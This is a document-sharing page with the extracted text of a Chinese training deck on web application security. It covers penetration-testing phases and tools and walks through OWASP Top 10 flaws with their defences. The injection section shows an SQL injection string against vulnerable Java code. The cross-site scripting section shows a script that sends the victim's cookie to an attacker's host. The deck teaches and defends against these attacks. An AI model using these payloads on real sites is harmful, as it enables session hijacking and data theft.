版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
Web應(yīng)用安全概覽MX團(tuán)隊(duì)內(nèi)部公開武漢安碩織信網(wǎng)絡(luò)科技有限公司目錄背景滲透測(cè)試Web應(yīng)用安全Nessus漏洞掃描功能安全性測(cè)試實(shí)戰(zhàn)演示背景根據(jù)中國(guó)互聯(lián)網(wǎng)絡(luò)信息中心2016年發(fā)布的“第37次中國(guó)互聯(lián)網(wǎng)絡(luò)發(fā)展?fàn)顩r統(tǒng)計(jì)報(bào)告
”,
2015年,42.7%的網(wǎng)民遭遇過(guò)網(wǎng)絡(luò)安全問(wèn)題。背景那企業(yè)呢?5月:俄國(guó)黑客盜取2.73億郵箱信息以1美元價(jià)錢販賣,其中包括
4000
萬(wàn)個(gè)雅虎郵箱、3300
萬(wàn)微軟郵箱以及
2400
萬(wàn)個(gè)谷歌郵箱。6月:MySpace4.27
億數(shù)據(jù)泄漏,或成互聯(lián)網(wǎng)史上最大規(guī)模的密碼泄露事件。應(yīng)用程序安全風(fēng)險(xiǎn)
攻擊者可以通過(guò)應(yīng)用程序中許多不同的路徑方法去危害您的業(yè)務(wù)或者企業(yè)組織。每種路徑方法都代表了一種風(fēng)險(xiǎn),這些風(fēng)險(xiǎn)可能會(huì),也有可能不會(huì)嚴(yán)重到值得您去關(guān)注。這樣的攻擊每時(shí)每刻都在重演,如何規(guī)避?將鏈路核心漏洞堵死對(duì)系統(tǒng)的任何弱點(diǎn)、技術(shù)缺陷或漏洞進(jìn)行主動(dòng)分析,滲透測(cè)試當(dāng)仁不讓滲透測(cè)試定義滲透測(cè)試(PenetrationTesting
或者
PenTesting,
PT)沒(méi)有一個(gè)標(biāo)準(zhǔn)的定義。國(guó)外一些安全組織達(dá)成共識(shí)的通用說(shuō)法是,滲透測(cè)試是通過(guò)模擬惡意黑客的攻擊方法,來(lái)評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全的一種評(píng)估方法。這個(gè)過(guò)程包括對(duì)系統(tǒng)的任何弱點(diǎn)、技術(shù)缺陷或洞的主動(dòng)分析,這個(gè)分析是從一個(gè)攻擊者可能存在的位置來(lái)進(jìn)行的,并且從這個(gè)位置有條件主動(dòng)利用安全漏洞,達(dá)到一定的控制權(quán)限。滲透測(cè)試是對(duì)用戶信息安全措施積極評(píng)估的過(guò)程。通過(guò)系統(tǒng)化的操作和分析,積極發(fā)現(xiàn)系統(tǒng)和網(wǎng)絡(luò)中存在的各種缺陷和弱點(diǎn),如設(shè)計(jì)缺陷和技術(shù)缺陷。滲透測(cè)試方法滲透測(cè)試與其他評(píng)估方法不同。通常的評(píng)估方法是根據(jù)已知信息資源或其他被評(píng)估對(duì)象,去發(fā)現(xiàn)所有相關(guān)的安全問(wèn)題。滲透測(cè)試是根據(jù)已知可利用的安全漏洞,去發(fā)現(xiàn)是否存在相應(yīng)的信息資源。相比較而言,通常評(píng)估方法對(duì)評(píng)估結(jié)果更具有全面性,而滲透測(cè)試更注重安全漏洞的嚴(yán)重性。滲透測(cè)試階段信息收集——兵馬未動(dòng),糧草先行漏洞掃描——知己知彼,百戰(zhàn)不殆漏洞利用——攻其不備,出其不意滲透測(cè)試——信息收集收集滲透目標(biāo)的情報(bào)是最重要的階段。如果收集到有用的情報(bào)資料的話,可以大大提高對(duì)滲透測(cè)試的成功性。收集滲透目標(biāo)的情報(bào)一般是對(duì)目標(biāo)系統(tǒng)的分析,掃描探測(cè),服務(wù)查點(diǎn),掃描對(duì)方漏洞,查找對(duì)方系統(tǒng)IP等,有時(shí)候滲透測(cè)試者也會(huì)用上“社會(huì)工程學(xué)”。滲透測(cè)試者會(huì)盡力搜集目標(biāo)系統(tǒng)的配置與安全防御以及防火墻等等。其主要知識(shí)點(diǎn)如下:枚舉服務(wù);測(cè)試網(wǎng)絡(luò)范圍;識(shí)別活躍的主機(jī)和查看打開的端口;系統(tǒng)指紋識(shí)別;服務(wù)指紋識(shí)別;其他信息收集手段;使用Maltego收集信息;繪制網(wǎng)絡(luò)圖。滲透測(cè)試——信息收集枚舉服務(wù)枚舉是一類程序,它允許用戶從一個(gè)網(wǎng)絡(luò)中收集某一類的所有相關(guān)信息。DNS枚舉可以收集本地所有DNS服務(wù)和相關(guān)條目。DNS枚舉可以幫助用戶收集目標(biāo)組織的關(guān)鍵信息,如用戶名、計(jì)算機(jī)名和IP地址等。常用工具主要有:DNS枚舉工具DNSenum;DNS枚舉工具fierce。滲透測(cè)試——信息收集測(cè)試網(wǎng)絡(luò)范圍測(cè)試網(wǎng)絡(luò)范圍內(nèi)的IP地址或域名也是滲透測(cè)試的一個(gè)重要部分。通過(guò)測(cè)試網(wǎng)絡(luò)范圍內(nèi)的IP地址或域名,確定是否有人入侵自己的網(wǎng)絡(luò)中并損害系統(tǒng)。常用工具主要有:域名查詢工具Dmitry:查詢IP或域名WHOIS信息;跟蹤路由工具Scapy。滲透測(cè)試——信息收集識(shí)別活躍的主機(jī)嘗試滲透測(cè)試之前,必須先識(shí)別在這個(gè)目標(biāo)網(wǎng)絡(luò)內(nèi)活躍的主機(jī)。常用工具主要有:網(wǎng)絡(luò)映射器工具Nmap:
免費(fèi)開放的網(wǎng)絡(luò)掃描和嗅探工具包
。滲透測(cè)試——信息收集查看打開的端口對(duì)一個(gè)大范圍的網(wǎng)絡(luò)或活躍的主機(jī)進(jìn)行滲透測(cè)試,必須要了解這些主機(jī)上所打開的端口號(hào)。常用工具主要有:TCP端口掃描工具Nmap;圖形化TCP端口掃描工具Zenmap。滲透測(cè)試——信息收集系統(tǒng)指紋識(shí)別系統(tǒng)指紋信息包括目標(biāo)主機(jī)打開的端口、MAC地址、操作系統(tǒng)類型和內(nèi)核版本等。常用工具主要有:使用Nmap工具識(shí)別系統(tǒng)指紋信息;指紋識(shí)別工具p0f。滲透測(cè)試——信息收集服務(wù)指紋識(shí)別服務(wù)指紋信息包括服務(wù)端口、服務(wù)名和版本等。常用工具主要有:使用Nmap工具識(shí)別服務(wù)指紋信息;服務(wù)枚舉工具Amap。滲透測(cè)試——信息收集其他信息收集手段Recon-NG框架:由Python編寫的一個(gè)開源的Web偵查(信息收集)框架;搜索引擎工具Shodan:Shodan可以說(shuō)是一款"黑暗"谷歌,一直不停的在尋找著所有和互聯(lián)網(wǎng)連接的服務(wù)器、攝像頭、打印機(jī)和路由器等。滲透測(cè)試——信息收集使用Maltego收集信息Maltego是一個(gè)開源的漏洞評(píng)估工具,它主要用于論證一個(gè)網(wǎng)絡(luò)內(nèi)單點(diǎn)故障的復(fù)雜性和嚴(yán)重性。該工具能夠聚集來(lái)自內(nèi)部和外部資源的信息,并且提供一個(gè)清晰的漏洞分析界面。滲透測(cè)試——信息收集繪制網(wǎng)絡(luò)結(jié)構(gòu)圖CaseFile工具用來(lái)繪制網(wǎng)絡(luò)結(jié)構(gòu)圖。使用該工具能快速添加和連接,并能以圖形界面形式靈活的構(gòu)建網(wǎng)絡(luò)結(jié)構(gòu)圖。滲透測(cè)試——漏洞掃描漏洞掃描器是一種能夠自動(dòng)在計(jì)算機(jī)、信息系統(tǒng)、網(wǎng)絡(luò)及應(yīng)用軟件中尋找和發(fā)現(xiàn)安全弱點(diǎn)的程序。它通過(guò)網(wǎng)絡(luò)對(duì)目標(biāo)系統(tǒng)進(jìn)行探測(cè),向目標(biāo)系統(tǒng)發(fā)生數(shù)據(jù),并將反饋數(shù)據(jù)與自帶的漏洞特征庫(kù)進(jìn)行匹配,進(jìn)而列舉目標(biāo)系統(tǒng)上存在的安全漏洞。漏洞掃描是保證系統(tǒng)和網(wǎng)絡(luò)安全必不可少的手段,面對(duì)互聯(lián)網(wǎng)入侵,如果用戶能夠根據(jù)具體的應(yīng)用環(huán)境,盡可能早的通過(guò)網(wǎng)絡(luò)掃描來(lái)發(fā)現(xiàn)安全漏洞,并及時(shí)采取適當(dāng)?shù)奶幚泶胧┻M(jìn)行修補(bǔ),就可以有效地阻止入侵事件的發(fā)生。漏洞掃描工作相對(duì)枯燥,所以我們可以借助一些便捷的工具來(lái)實(shí)施,如Nessus和OpenVAS。滲透測(cè)試——漏洞掃描NessusNessus號(hào)稱是世界上最流行的漏洞掃描程序,全世界有超過(guò)75000個(gè)組織在使用它。該工具提供完整的電腦漏洞掃描服務(wù),并隨時(shí)更新其漏洞數(shù)據(jù)庫(kù)。Nessus不同于傳統(tǒng)的漏洞掃描軟件,Nessus可同時(shí)在本機(jī)或遠(yuǎn)端上遙控,進(jìn)行系統(tǒng)的漏洞分析掃描。OpenVASOpenVAS(開放式漏洞評(píng)估系統(tǒng))是一個(gè)客戶端/服務(wù)器架構(gòu),它常用來(lái)評(píng)估目標(biāo)主機(jī)上的漏洞。OpenVAS是Nessus項(xiàng)目的一個(gè)分支,它提供的產(chǎn)品是完全地免費(fèi)。滲透測(cè)試——漏洞利用漏洞利用階段利用已獲得的信息和各種攻擊手段實(shí)施滲透。網(wǎng)絡(luò)應(yīng)用程序漏洞診斷項(xiàng)目的加密通信漏洞診斷是必須執(zhí)行的。顧名思義,利用漏洞,達(dá)到攻擊的目的。漏洞利用是獲得系統(tǒng)控制權(quán)限的重要途徑。用戶從目標(biāo)系統(tǒng)中找到容易攻擊的漏洞,然后利用該漏洞獲取權(quán)限,從而實(shí)現(xiàn)對(duì)目標(biāo)系統(tǒng)的控制。Metasploit是一款開源的安全漏洞檢測(cè)工具框架。它可以幫助用戶識(shí)別安全問(wèn)題,驗(yàn)證漏洞的緩解措施,并對(duì)某些軟件進(jìn)行安全性評(píng)估,提供真正的安全風(fēng)險(xiǎn)情報(bào)。滲透測(cè)試——
Kali
LinuxKaliLinux是基于Debian的Linux發(fā)行版,設(shè)計(jì)用于數(shù)字取證和滲透測(cè)試。KaliLinux預(yù)裝了許多滲透測(cè)試軟件,包括nmap(端口掃描器)、Wireshark(數(shù)據(jù)包分析器)、JohntheRipper(密碼破解器),以及Aircrack-ng(一應(yīng)用于對(duì)無(wú)線局域網(wǎng)進(jìn)行滲透測(cè)試的軟件)等。Web
應(yīng)用安全OWASP(OpenWebApplicationSecurityProject,
開源web應(yīng)用安全項(xiàng)目)每隔數(shù)年會(huì)更新10個(gè)最關(guān)鍵的Web應(yīng)用安全問(wèn)題清單,即OWASPTop10。Web
應(yīng)用安全——
OWASPTop10Web
應(yīng)用安全——
OWASPTop10Web漏洞——注入攻擊案例:應(yīng)用程序在下面存在漏洞的
SQL
語(yǔ)句的構(gòu)造中使用不可信數(shù)據(jù):Stringquery="SELECT*FROMaccountsWHEREcustID='"+request.getParameter("id")+"'";攻擊者在瀏覽器中將“id”參數(shù)的值修改成:
'or'1'='1Web漏洞——
注入如何防止?防止注入漏洞需要將不可信數(shù)據(jù)從命令及查詢中區(qū)分開。最佳選擇是使用安全的API,完全避免使用解釋器或供參數(shù)化界面的API。但要注意有些參數(shù)化的API,比如存儲(chǔ)過(guò)程(storedprocedures),如果使用不當(dāng),仍然可以引入注入漏洞。如果沒(méi)法使用一個(gè)參數(shù)化的API,那么你應(yīng)該使用解釋器具體的escape語(yǔ)法來(lái)避免特殊字符。OWASP的ESAPI就有一些escape例程。使用正面的或“白名單”的具有恰當(dāng)?shù)囊?guī)范化的輸入驗(yàn)證方法同樣會(huì)有助于防止注入攻擊。但由于很多應(yīng)用在輸入中需要特殊字符,這一方法不是完整的防護(hù)方法。OWASP的ESAPI中包含一個(gè)白名單輸入驗(yàn)證例程的擴(kuò)展庫(kù)。Web漏洞——
失效的身份認(rèn)證和會(huì)話管理攻擊案例:案例1:應(yīng)用程序超時(shí)設(shè)置不當(dāng)。用戶使用公共計(jì)算機(jī)訪問(wèn)網(wǎng)站。離開時(shí),該用戶沒(méi)有點(diǎn)擊退出,而是直接關(guān)閉瀏覽器。攻擊者在一個(gè)小時(shí)后能使用相同瀏覽器通過(guò)身份認(rèn)證。案例2:內(nèi)部或外部攻擊者進(jìn)入系統(tǒng)的密碼數(shù)據(jù)庫(kù).存儲(chǔ)在數(shù)據(jù)庫(kù)中的用戶密碼沒(méi)有被加密,所有用戶的密碼都被攻擊者獲得。如何防止?對(duì)企業(yè)最主要的建議是讓開發(fā)人員使用如下資源。一套單一的強(qiáng)大的認(rèn)證和會(huì)話管理控制系統(tǒng)。企業(yè)同樣也要做出巨大努力來(lái)避免跨站漏洞,因?yàn)檫@一漏洞可以用來(lái)盜竊用戶會(huì)話ID。Web漏洞——
失效的身份認(rèn)證和會(huì)話管理Web漏洞——跨站腳本(XSS)攻擊案例:應(yīng)用程序在下面HTML代碼段的構(gòu)造中使用未經(jīng)驗(yàn)證或轉(zhuǎn)義的不可信的數(shù)據(jù):(String)page+="<inputname='creditcard'type='TEXT‘value='"+request.getParameter("CC")+"'>";攻擊者在瀏覽器中修改“CC”參數(shù)為如下值:'><script>document.locakon='h\p://www.a\/cgi-bin/cookie.cgi?foo='+document.cookie</script>'這導(dǎo)致受害者的會(huì)話ID被發(fā)送到攻擊者的網(wǎng)站,使得攻擊者能夠劫持用戶當(dāng)前會(huì)話。請(qǐng)注意攻擊者同樣能使用跨站腳本攻破應(yīng)用程序可能使用的任何跨站請(qǐng)求偽造(CSRF)防御機(jī)制。Web漏洞——跨站腳本(XSS)如何防止?防止XSS需要將不可信數(shù)據(jù)與動(dòng)態(tài)的瀏覽器內(nèi)容區(qū)分開。最好的辦法是根據(jù)數(shù)據(jù)將要置于的HTML上下文(包括主體、屬性、JavaScript、CSS或URL)對(duì)所有的不可信數(shù)據(jù)進(jìn)行恰當(dāng)?shù)霓D(zhuǎn)義(escape)。使用正面的或“白名單”的,具有恰當(dāng)?shù)囊?guī)范化和解碼功能的輸入驗(yàn)證方法同樣會(huì)有助于防止跨站腳本但由于很多應(yīng)用程序在輸入中需要特殊字符,這一方法不是完整的防護(hù)方法。這種驗(yàn)證方法需要盡可能地解碼任何編碼輸入,同時(shí)在接受輸入之前需要充分驗(yàn)證數(shù)據(jù)的長(zhǎng)度、字符、格式、和任何商務(wù)規(guī)則。考慮使用內(nèi)容安全策略(CSP)來(lái)抵御整個(gè)網(wǎng)站的跨站腳本攻擊。Web漏洞——不安全的直接對(duì)象引用攻擊案例:
應(yīng)用程序在訪問(wèn)帳戶信息的SQL調(diào)用中使用未驗(yàn)證數(shù)據(jù):Stringquery="SELECT*FROMacctsWHEREaccount=?";PreparedStatementpstmt=conneckon.prepareStatement(query,...);pstmt.setString(1,request.getparameter("acct"));ResultSetresults=pstmt.executeQuery();攻擊者能輕易在瀏覽器將“acct”參數(shù)修改成他所想要的任何賬戶號(hào)碼。如果應(yīng)用程序沒(méi)有進(jìn)行恰當(dāng)?shù)尿?yàn)證,攻擊者就能訪問(wèn)任何用戶的賬戶,而不僅僅是該目標(biāo)用戶的賬戶。Web漏洞——不安全的直接對(duì)象引用如何防止?要防止不安全的直接對(duì)象引用,需要選擇一個(gè)適當(dāng)?shù)姆椒▉?lái)保護(hù)每一個(gè)用戶可訪問(wèn)的對(duì)象(如對(duì)象號(hào)碼、文件名)。使用基于用戶或者會(huì)話的間接對(duì)象引用。這樣能防止攻擊者直接攻擊未授權(quán)資源。例如,一個(gè)下拉列表包含6個(gè)授權(quán)給當(dāng)前用戶的資源,它可以使用數(shù)字1-6來(lái)指示哪個(gè)是用戶選擇的值,而不是使用資源的數(shù)據(jù)庫(kù)關(guān)鍵字來(lái)表示。在服務(wù)器端,應(yīng)用程序需要將每個(gè)用戶的間接引用映射到實(shí)際的數(shù)據(jù)庫(kù)關(guān)鍵字。檢查訪問(wèn)。任何來(lái)自不可信源的直接對(duì)象引用都必須通過(guò)訪問(wèn)控制檢測(cè),確保該用戶對(duì)請(qǐng)求的對(duì)象有訪問(wèn)權(quán)限。Web漏洞——
安全配置錯(cuò)誤攻擊案例:案例1:應(yīng)用程序服務(wù)器管理員控制臺(tái)自動(dòng)安裝后沒(méi)有被刪除。而默認(rèn)帳戶也沒(méi)有被改變。攻擊者在你的服務(wù)器上發(fā)現(xiàn)了標(biāo)準(zhǔn)的管理員頁(yè)面,通過(guò)默認(rèn)密碼登錄,從而接管了你的服務(wù)器。案例2:目錄列表在你的服務(wù)器上未被禁用。攻擊者發(fā)現(xiàn)只需列出目錄,她就可以找到你服務(wù)器上的任意文件。攻擊者找到并下載所有已編譯的Java類,她通過(guò)反編譯獲得了所有你的自定義代碼。然后,她在你的應(yīng)用程序中找到一個(gè)訪問(wèn)控制的嚴(yán)重漏洞。如何防止?主要的建議建立在以下幾個(gè)方面:一個(gè)可以快速且易于部署在另一個(gè)鎖定環(huán)境的可重復(fù)的加固過(guò)程。開發(fā)、質(zhì)量保證和生產(chǎn)環(huán)境都應(yīng)該配置相同(每個(gè)環(huán)境中使用不同的密碼)。這個(gè)過(guò)程應(yīng)該是自動(dòng)化的,以盡量減少安裝一個(gè)新安全環(huán)境的耗費(fèi)。一個(gè)能及時(shí)了解并部署每個(gè)已部署環(huán)境的所有最新軟件更新和補(bǔ)丁的過(guò)程。這需要包括通常被忽略的所有代碼的庫(kù)文件。一個(gè)能在組件之間供有效的分離和安全性的強(qiáng)大應(yīng)用程序架構(gòu)。實(shí)施漏洞掃和經(jīng)常進(jìn)行審計(jì)以幫助檢測(cè)將來(lái)可能的錯(cuò)誤配置或沒(méi)有安裝的補(bǔ)丁。Web漏洞——安全配置錯(cuò)誤Web漏洞——
敏感信息泄露攻擊案例:案例1:一個(gè)應(yīng)用程序加密存儲(chǔ)在數(shù)據(jù)庫(kù)的信用卡信息,以防止信用卡信息暴露給最終用戶。但是,數(shù)據(jù)庫(kù)設(shè)置為對(duì)信用卡表列的查詢進(jìn)行自動(dòng)解密,這就使得SQL注入漏洞能夠獲得所有信用卡信息的明文。該系統(tǒng)應(yīng)該被設(shè)置為前端應(yīng)用程序使用公鑰對(duì)信用卡信息加密,后端應(yīng)用程序只能使用私鑰解密。案例2:一個(gè)網(wǎng)站上所有需要身份驗(yàn)證的網(wǎng)頁(yè)都沒(méi)有使用SSL。攻擊者只需監(jiān)控網(wǎng)絡(luò)數(shù)據(jù)流(比如一個(gè)開放的無(wú)線網(wǎng)絡(luò)或其社區(qū)的有線網(wǎng)絡(luò)),并竊取一個(gè)已驗(yàn)證的受害者的會(huì)話cookie。然后,攻擊者利用這個(gè)cookie執(zhí)行重放攻擊并接管用戶的會(huì)話從而訪問(wèn)用戶的隱私數(shù)據(jù)。如何防止?有關(guān)使用不安全的加密算法、SSL使用和數(shù)據(jù)保護(hù)的風(fēng)險(xiǎn)超出了Top10的范圍。盡管如此,對(duì)一些需要加密的敏感數(shù)據(jù),應(yīng)該起碼做到以下幾點(diǎn):預(yù)測(cè)一些威脅(比如內(nèi)部攻擊和外部用戶),加密這些數(shù)據(jù)的存儲(chǔ)以確保免受這些威脅。對(duì)于沒(méi)必要存放的、重要的敏感數(shù)據(jù),應(yīng)當(dāng)盡快清除。確保使用了合適的強(qiáng)大的標(biāo)準(zhǔn)算法和強(qiáng)大的密匙,并且密匙管理到位。確保使用密碼專用算法存儲(chǔ)密碼,如:bcrypt、PBKDF2或者scrypt。禁用自動(dòng)完成防止敏感數(shù)據(jù)收集,禁用包含敏感數(shù)據(jù)的緩存頁(yè)面。Web漏洞——敏感信息泄露Web漏洞——功能級(jí)訪問(wèn)控制缺失攻擊案例:攻擊者僅僅直接瀏覽目標(biāo)網(wǎng)址。例如下面的兩個(gè)網(wǎng)址都需要身份驗(yàn)證,而且訪問(wèn)“admin_getappInfo”頁(yè)面還需要管理員權(quán)限。http:///app/getappInfohttp:///app/admin_getappInfo如果未認(rèn)證的用戶可以訪問(wèn)上述任一頁(yè)面,這就是漏洞。如果通過(guò)驗(yàn)證的非管理員用戶也能允許訪問(wèn)“admin_getappInfo”頁(yè)面,這同樣是個(gè)漏洞。Web漏洞——功能級(jí)訪問(wèn)控制缺失如何防止?您的應(yīng)用程序應(yīng)該使用一致的和易于分析的授權(quán)模塊,并能在所有的業(yè)務(wù)功能中調(diào)用該模塊。通常是,由一個(gè)或多個(gè)外部組件向應(yīng)用代碼內(nèi)部供這種保護(hù)??紤]一下管理權(quán)利的過(guò)程并確保能夠容易的進(jìn)行升級(jí)和審計(jì)。切忌硬編碼。執(zhí)行機(jī)制在缺省情況下,應(yīng)該拒絕所有訪問(wèn)。對(duì)于每個(gè)功能的訪問(wèn),需要明確授予特定角色的訪問(wèn)權(quán)限。如果某功能參與了工作流程,檢查并確保當(dāng)前的條件是授權(quán)訪問(wèn)此功能的合適狀態(tài)。Nessus漏洞掃描—檢測(cè)范圍操作系統(tǒng)漏洞檢測(cè)
對(duì)Windows、Solaris、AIX、Linux、SCO、SGI等操作系統(tǒng)本身進(jìn)行漏洞檢測(cè);數(shù)據(jù)庫(kù)漏洞檢測(cè)
對(duì)MS-SQL、Oracle、MySQL、Informix、Sybase、DB2、Access等數(shù)據(jù)庫(kù)進(jìn)行漏洞檢測(cè);應(yīng)用系統(tǒng)漏洞檢測(cè)
對(duì)滲透目標(biāo)提供的各種應(yīng)用,如ASP、CG
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 養(yǎng)老院老人家庭關(guān)系溝通制度
- 新經(jīng)濟(jì)環(huán)境下企業(yè)如何進(jìn)行戰(zhàn)略管理博商課件
- 攤位租賃合同(2篇)
- 《平面設(shè)計(jì)緒論》課件
- 2024年度工業(yè)產(chǎn)品可靠性檢測(cè)委托協(xié)議書3篇
- 2025年內(nèi)蒙古考貨運(yùn)從業(yè)資格證題庫(kù)及答案
- 2025年承德貨運(yùn)從業(yè)資格證科目一考試答案
- 2024年版建筑施工合同書下載
- 企業(yè)文化培訓(xùn)課件-管理實(shí)踐
- 2025年宜春貨運(yùn)資格證考試口訣
- 大學(xué)體育與科學(xué)健身智慧樹知到期末考試答案章節(jié)答案2024年溫州醫(yī)科大學(xué)
- 24秋國(guó)家開放大學(xué)《計(jì)算機(jī)系統(tǒng)與維護(hù)》實(shí)驗(yàn)1-13參考答案
- 走進(jìn)民航智慧樹知到期末考試答案章節(jié)答案2024年中國(guó)民航大學(xué)
- 機(jī)械制圖基礎(chǔ)知識(shí)
- 靜脈治療小組工作計(jì)劃_
- 施工現(xiàn)場(chǎng)臨時(shí)用電驗(yàn)收記錄(新)2頁(yè)
- 入團(tuán)志愿書(2016版本)(可編輯打印標(biāo)準(zhǔn)A4)
- (完整word版)北師大版四年級(jí)數(shù)學(xué)上冊(cè)運(yùn)算律練習(xí)
- 淺談測(cè)繪技術(shù)的應(yīng)用及質(zhì)量控制
- 電氣設(shè)備安裝及調(diào)試重要性分析
- 2019年12月六級(jí)第一套(含答案)
評(píng)論
0/150
提交評(píng)論